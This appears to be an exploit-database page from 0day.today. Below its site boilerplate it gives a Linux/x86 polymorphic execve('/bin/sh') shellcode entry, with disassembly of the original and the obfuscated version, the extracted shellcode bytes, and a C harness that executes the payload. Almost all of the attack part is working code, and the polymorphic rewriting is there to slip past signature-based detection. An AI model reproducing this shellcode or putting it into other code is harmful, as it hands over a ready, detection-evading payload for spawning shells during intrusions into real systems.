0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
[/*
; Date: 09/03/2019
; Polymorphic_Execve_Sh_Stack.asm
; Author: Daniele Votta
; Description: This program invoke a Polimorphic version of excve.
Original Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 2f 2f 73 68 push 0x68732f2f
8048088: 68 2f 62 69 6e push 0x6e69622f
804808d: 89 e3 mov ebx,esp
804808f: 50 push eax
8048090: 89 e2 mov edx,esp
8048092: 53 push ebx
8048093: 89 e1 mov ecx,esp
8048095: b0 0b mov al,0xb
8048097: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
Shellcode Length:25
======================= POC Daniele Votta =======================
Polimorphic_Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c3 xor ebx,eax
8048082: 31 d8 xor eax,ebx
8048084: 89 c1 mov ecx,eax
8048086: 51 push ecx
8048087: bf 40 40 84 79 mov edi,0x79844040
804808c: 81 ef 11 11 11 11 sub edi,0x11111111
8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi
8048096: bf 2f 62 69 6e mov edi,0x6e69622f
804809b: 81 c7 11 11 11 11 add edi,0x11111111
80480a1: 81 ef 11 11 11 11 sub edi,0x11111111
80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi
80480ab: 83 ec 04 sub esp,0x4
80480ae: 83 ec 04 sub esp,0x4
80480b1: 89 e3 mov ebx,esp
80480b3: 50 push eax
80480b4: 89 e2 mov edx,esp
80480b6: 53 push ebx
80480b7: 89 e1 mov ecx,esp
80480b9: b0 01 mov al,0x1
80480bb: 04 0a add al,0xa
80480bd: cd 80 int 0x80
[+] Extract Shellcode ...
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80"
Shellcode Length:63
======================= POC Daniele Votta =======================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc3\x31\xd8\x89\xc1\x51\xbf\x40\x40\x84\x79\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xfc\xbf\x2f\x62\x69\x6e\x81\xc7\x11\x11\x11\x11\x81\xef\x11\x11\x11\x11\x89\x7c\x24\xf8\x83\xec\x04\x83\xec\x04\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x01\x04\x0a\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# 0day.today [2024-11-16] #